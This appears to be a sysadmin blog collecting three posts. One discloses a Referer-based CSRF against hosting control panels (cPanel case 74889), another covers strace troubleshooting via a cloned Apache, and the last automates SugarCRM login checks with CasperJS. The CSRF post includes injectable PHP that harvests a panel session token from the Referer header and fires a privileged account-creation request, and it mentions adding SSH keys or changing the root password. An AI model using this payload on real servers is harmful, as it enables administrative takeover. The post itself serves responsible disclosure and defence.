Control Panels, Cross Site Request Forgery, and Case 74889

The rise of web hosting control panels has changed the landscape of the web hosting industry dramatically. They reduce the barrier to entry for server administration by automating configuration and management tasks within a web-based GUI. Before this, server administrators had to configure their systems by hand, or through a suite of their own custom shell scripts and such.

While this has allowed more people to enter the business and become resellers and administrators, it has its drawbacks. Some would argue that it has damaged the industry by ushering in a wave of administrators who aren’t qualified or knowledgeable enough to properly manage a server. In the right hands, though, these panels can be a big help to novices and veterans alike.

That argument aside, something has never felt right to me about a web interface you log into as root to run commands. It’s essentially a rootkit with a pretty front-end. That said, there are protections in place to prevent exploitation; cPanel in particular has a strong security track record, and their security team, in my experience, was responsive and a pleasure to work with.

One problem that I don’t think gets enough attention with control panels like cPanel, Plesk, Webmin, DirectAdmin, and others is the possibility of self-induced Cross-Site Request Forgery, for lack of a better term.

Consider this hypothetical attack:

1) Compromise one or more vulnerable sites on the server (perhaps an outdated Joomla or WordPress site), and inject code like the following:

<?php

// Grab the Referer header (empty if the browser didn't send one)
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// Does the referer look like a panel URL carrying a session token?
if (preg_match('/https?:\/\/.*\/sess_token[0-9]{10}/', $ref, $matches)) {
	// Build a privileged panel request using the leaked token...
	$url = $matches[0] . "/api/create_reseller_account.php?resources=unlimited";
	// ...and have the admin's own browser fire it off in a new tab
	echo "<script>window.open('$url','_blank');</script>";
}

2) Wait for a systems administrator, logged into the panel as root, to click the URL link for the hacked domain from within the control panel. The code above would have the sysadmin unknowingly create an account with full privileges. It doesn’t take much creativity to do far worse: adding a public SSH key through the panel, changing the root password, or anything else they’re allowed to do.

The CSRF session token, designed to prevent this type of attack, will be useless because the administrator just handed it to the hacked site via the referer (assuming their browser passes referers, which is the default in most browsers). The method above opens a new tab in the victim administrator’s browser to make the malicious control panel request, but you could easily make the action less transparent. Note also that my regular expression matches an optional https, but I believe this attack will only work if the administrator is using non-secure access to the panel. * – See #2 below.
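
To make the leak concrete, here’s a hedged illustration; the panel hostname, port, and token below are made up for the example. Any request the browser fires from the panel page carries the full panel URL, token included, in the Referer header, which you can reproduce by hand with curl:

$ curl -v --referer 'http://panel.example.com:2086/sess_token0123456789/' 'http://hacked-site.example.com/'   # made-up hosts and token

The injected PHP above only has to pattern-match that header to recover a working session URL.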

I submitted a very similar, working POC to cPanel’s security team, and they corrected the issue (Case 74889) within a few weeks. I’m willing to bet, however, that it’s a problem in other panels like Plesk, and perhaps in other parts of cPanel that provide URL links to sites on the server. In this case, the POC was very similar to the code above, and the vulnerability was in the URLs in the “Manage SSL Hosts” section of the panel. They corrected it by cleansing the requests before redirecting you to the destination domain, so the referer is removed.

The reason I call it a self-induced CSRF is that it’s not exactly a plain-vanilla CSRF attack. Typically you would post a malicious link to a remote forum or chat, or email it to the victim, hoping they already have an active session at some other site. For example:

<a href="http://192.168.0.1/my-router/reset-router-password.php">Funny Cat Gifs LOL</a>

The above could be easily mitigated if the router’s admin panel used a randomized CSRF token in the URL.

In the case of the control panel attack, however, it bypasses any CSRF protection because the malicious link is clicked from the same origin being exploited, and the token is provided to us free of charge. If there’s a proper name for this type of attack, I don’t know it.

The moral of the story is:

1) Server Admin Control Panels will never really be secure.
2) * – Always use https if you have to use them. IIRC, browsers will never send a Referer header when the scheme drops from https to http. (A cross-origin https-to-https request can still carry one, so treat this as damage control rather than a guarantee.)
3) Just don’t click remote URLs from within a control panel if you don’t have to. Copy and paste the address into a new tab instead; a manually typed or pasted URL sends no Referer header. (A middle-click is still an ordinary link navigation, so it will send one.)

Advanced Troubleshooting with Strace

Sometimes a site is performing erratically or loading slowly, and it’s not evident what the problem is. When you’ve run out of standard troubleshooting methods, it might be time to go deeper.

One way to do that is with a tool called strace, which lets you watch the system calls a process makes to the kernel in real time.

You can pass it a process id, or run it in front of a command.

Quick example:

Let’s use the -e trace option to tell strace what type of system calls we’re interested in; we want to see what files it’s opening. We suspect that the host command will check /etc/resolv.conf before querying the internet for an A record, so let’s verify that.

$ strace -e trace=open host google.com 2>&1 | grep resolv.conf
open("/etc/resolv.conf", O_RDONLY|O_LARGEFILE) = 6

As we expected, it does make an attempt to open that file.

Note that I redirected STDERR to STDOUT so I could grep the output. strace writes its output to STDERR. I won’t go into too much more detail about strace for now, but you get the idea.

Now back to our hypothetical slow or erratic website. The first step in troubleshooting an issue is duplicating the problem. The second is making it repeatable. The third is isolating it so you can pick it apart and examine it. On a busy webserver, the trouble with that last step is that you don’t know which apache PID is serving you, and you can’t isolate what you can’t identify.

There are some hacky workarounds for isolating the apache process id that’s serving your HTTP requests. You can telnet to the server from the server, and find the pid via lsof, or netstat:

$ telnet localhost 80
GET / HTTP/1.1
Host: slow-domain.com

Then open another screen on the server, and find your telnet pid with netstat:

$ netstat -tapn

[..snip..]
tcp6       0      0 127.0.0.1:80            127.0.0.1:40402         ESTABLISHED 20008/apache2            
tcp        0      0 127.0.0.1:40402         127.0.0.1:80            ESTABLISHED 23955/telnet 

From this we know that process id 20008 is serving my telnet request, because the telnet client’s local port (40402) appears as the remote port on the apache2 line. You can then strace that PID and quickly send the final carriage return in your telnet session to fire the request. But this is clunky, has race condition issues, and frankly it’s hard to get right.
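
If lsof is installed, you can get the same answer in one shot. This is just an alternative sketch, using the ephemeral port from the netstat output above:

$ lsof -nP -iTCP:40402 -sTCP:ESTABLISHED   # 40402 = the telnet client's local port

That lists both ends of the loopback connection, including the apache2 child and its PID.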

But there is a better way. You can launch another instance of apache on different ports, say 81 and 444 (for https). Set MaxClients to 1, so only a single child process ever serves requests, then add an iptables rule that only allows your remote IP to reach those destination ports.
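
Here’s a minimal sketch of that iptables rule, assuming your workstation’s IP is 203.0.113.5 (a placeholder; substitute your own):

$ iptables -A INPUT -p tcp -m multiport --dports 81,444 ! -s 203.0.113.5 -j DROP   # 203.0.113.5 = placeholder IP

Anything that isn’t you gets dropped before it ever reaches the cloned apache.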

Here’s an example of how you can do this on a cPanel server. Keep in mind, you may not need to copy everything like I did; I just wanted an exact replica running on the alternate ports. You might want to exclude large log files and such if your apache directory is large.

Clone the apache directory in full (binaries, conf, everything)

$ cp -r /usr/local/apache /usr/local/apache-tmp

Change ports for http and https so we can run ours without affecting the regular apache
$ cd /usr/local/apache-tmp
$ find . -type f -exec sed -i 's/:80/:81/g' {} \;
$ find . -type f -exec sed -i 's/:443/:444/g' {} \;

Only allow one maxclient, so we can find the apache pid serving us when we hit the site
$ find . -type f -exec sed -i 's/MaxClients.*/MaxClients 1/g' {} \;

Modify all absolute path references to the normal apache dir to our cloned one
$ find . -type f -exec sed -i 's/\/usr\/local\/apache/\/usr\/local\/apache-tmp/g' {} \;

Now we can start our cloned apache on the alternate ports 81 and 444, with only one client allowed at a time. You should then be able to access every site on the server via the alternate ports.
$ httpd -d /usr/local/apache-tmp/ -f /usr/local/apache-tmp/conf/httpd.conf

That launches the root httpd process with one child PID, as expected.
Now find the child PID:
$ ps auxf | grep apache-tmp

Now attach strace to the one and only apache child process:
$ strace -p PID_HERE -f -s 2048

The -f option tells strace to follow child processes.
The -s option sets how many bytes of string data to print for each call; the default is a stingy 32, and 2048 might be overkill, so feel free to adjust it.
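
When the complaint is specifically slowness, a couple of extra flags make the slow calls stand out. This variation is my own suggestion rather than a required step:

$ strace -p PID_HERE -f -s 2048 -tt -T -o /tmp/slow-site.trace   # log path is arbitrary

-tt prints microsecond timestamps, -T appends the time spent inside each syscall, and -o writes everything to a file you can dig through afterwards.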

Then make the http request:

$ curl slowsite.com:81/badcode.php
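
If you want hard timing numbers to go with the trace (same hypothetical URL as above), curl can report where the time goes:

$ curl -s -o /dev/null -w 'dns:%{time_namelookup} connect:%{time_connect} ttfb:%{time_starttransfer} total:%{time_total}\n' slowsite.com:81/badcode.php

A large gap between connect and ttfb usually means the time is being spent server-side, in our hypothetical badcode.php.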

This is definitely a drastic troubleshooting method, but it’s great for those times when you hit a brick wall diagnosing a slow-loading or erratically behaving site and feel compelled to find the issue.

Note: cPanel changes its directory structure with updates from time to time. I did this a few months ago on a cPanel 11.40 build, I believe. YMMV; use this tactic with caution.

Using CasperJS to Automate Server Migration Testing

CasperJS is an open source navigation scripting and testing utility written in JavaScript by Nicolas Perriault for the PhantomJS WebKit headless browser. It also works with the Gecko-based SlimerJS as an alternative engine.

What does all of that mean? It means you can emulate navigation steps just as you would in a browser — without the browser.

I’ve played with PhantomJS in the past out of curiosity, but never thought it would become an important tool in my sysadmin toolbox. Well, it is now.

I was recently tasked with migrating SugarCRM instances. There are enough of them that manually testing each login post-migration was not something I was looking forward to. It’s fairly trivial to do this with cURL, but I wanted to take it a step further: take a screenshot of the page after logging in and save it to a file, all automagically. Enter CasperJS.

First, we create a new Casper instance. Setting verbose and the debug logLevel is very useful for testing, but it’s optional. Notice there’s a built-in test framework as well!

phantom.casperTest = true;
require("utils");

var casper = require('casper').create({
	verbose: true, 
	logLevel: 'debug',
	pageSettings: {
		userAgent: 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140611 Firefox/24.0 Iceweasel/24.6.0'
	}
});

Next, since I’m a sysadmin and Linux junkie, I live in the command line, so I’m using the CLI option-parsing features built right into CasperJS. I think the code below is pretty self-explanatory, and the options parsing just works:

Sample CLI usage:

kevin@kevops:~/$ casperjs ./sugarcrm-login.js --host="some-sugarcrm-site.com" --user="admin" --pass="p4ssw0rd" --ssl --imgdir="/home/kevin/screenshots/"

var host 		= casper.cli.get('host');
var user_name 		= casper.cli.get('user');
var user_password 	= casper.cli.get('pass');
var scheme		= 'http://';
var imgdir		= '/tmp/';

if (casper.cli.has('ssl')) { scheme = 'https://'; }
if (casper.cli.has('imgdir')) { imgdir = casper.cli.get('imgdir'); }

var base_uri = scheme + host;

Add some event listeners. The first lets us print remote console.log messages locally. The second fires when a page leaves a JavaScript error uncaught.
casper.on('remote.message', function(msg) {
    this.echo('remote message caught: ' + msg);
});

casper.on("page.error", function(msg, trace) {
    this.echo("Page Error: " + msg, "ERROR");
});

Time to fire it up. One of the great things CasperJS adds on top of PhantomJS is the ability to write simple code in a procedural way. This matters when you’re testing page navigation for a website, and it avoids some of the headaches of JavaScript’s asynchronous nature. The first thing we do is call casper.start(); this is what first loads the URL.

Note that I’m trying out the test framework here, just to see how it works. It’s simple and intuitive if you’re familiar with testing frameworks.

casper.start(base_uri, function() {
	this.test.assertExists('form#form', 'form found!');
});

We determined that the form exists with our test statement, so now we need to fill in the fields and submit. Keep in mind, .fill() is looking for the “name” property of the form fields, which are user_name and user_password in the case of SugarCRM logins.
casper.then(function() {
	this.fill('form#form', {
		'user_name':		user_name,
		'user_password':	user_password,
	}, true);
});

How does it work? Magic.
So that filled out the form, submitted it, and moved on to the next page, just like you would in a browser. Is it really that simple? Yup.

Even more magical: we can take a screenshot once we log in, and save it. How cool is that?

// login and grab snapshot
casper.then(function() {
	casper.viewport(1024, 768);
	this.capture(imgdir + host + '_login.jpg', undefined, {
        	quality: 100
	});
});

casper.run();

casper.run() is the final call; it kicks off the whole thing.

So now, since these SugarCRM sites all share a superadmin login and password, I can do something like this post-migration:

#!/bin/bash
grep -i servername /etc/httpd/conf/httpd.conf | awk '{print $2}' | \
while IFS= read -r domain; do
  casperjs ./sugarcrm-login.js --host="$domain" --user="admin" --pass="p4ssw0rd" --imgdir="/home/kevin/tmp/sugar-migrations/screenshots/"
done

Of course, I think I’ll add a lot more testing and more command-line options, test whether both http and https are working, and probably click through the admin panel for more thorough post-migration checks. I’d also like separate log files for each domain, but I’m not sure yet.

My next casperJS project will be to automate my daily work clock-ins. We have to login and logout of a web portal each day at work. Automating this each day with a screenshot is a perfect use case, and I’ll have meticulous records in case there’s ever an attendance discrepancy. 😎

sugarcrm-login.js:

phantom.casperTest = true;
require("utils");

var casper = require('casper').create({
	verbose: true, 
	logLevel: 'debug',
	pageSettings: {
		userAgent: 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140611 Firefox/24.0 Iceweasel/24.6.0'
	}
});

var host 		= casper.cli.get('host');
var user_name 		= casper.cli.get('user');
var user_password 	= casper.cli.get('pass');
var scheme		= 'http://';
var imgdir		= '/tmp/';

if (casper.cli.has('ssl')) { scheme = 'https://'; }
if (casper.cli.has('imgdir')) { imgdir = casper.cli.get('imgdir'); }

var base_uri = scheme + host;

casper.on('remote.message', function(msg) {
    this.echo('remote message caught: ' + msg);
});

casper.on("page.error", function(msg, trace) {
    this.echo("Page Error: " + msg, "ERROR");
});

casper.start(base_uri, function() {
	this.test.assertExists('form#form', 'form found!');
});

casper.then(function() {
	this.fill('form#form', {
		'user_name':		user_name,
		'user_password':	user_password,
	}, true);
});

// login and grab snapshot
casper.then(function() {
	casper.viewport(1024, 768);
	this.capture(imgdir + host + '_login.jpg', undefined, {
        	quality: 100
	});
});

casper.run();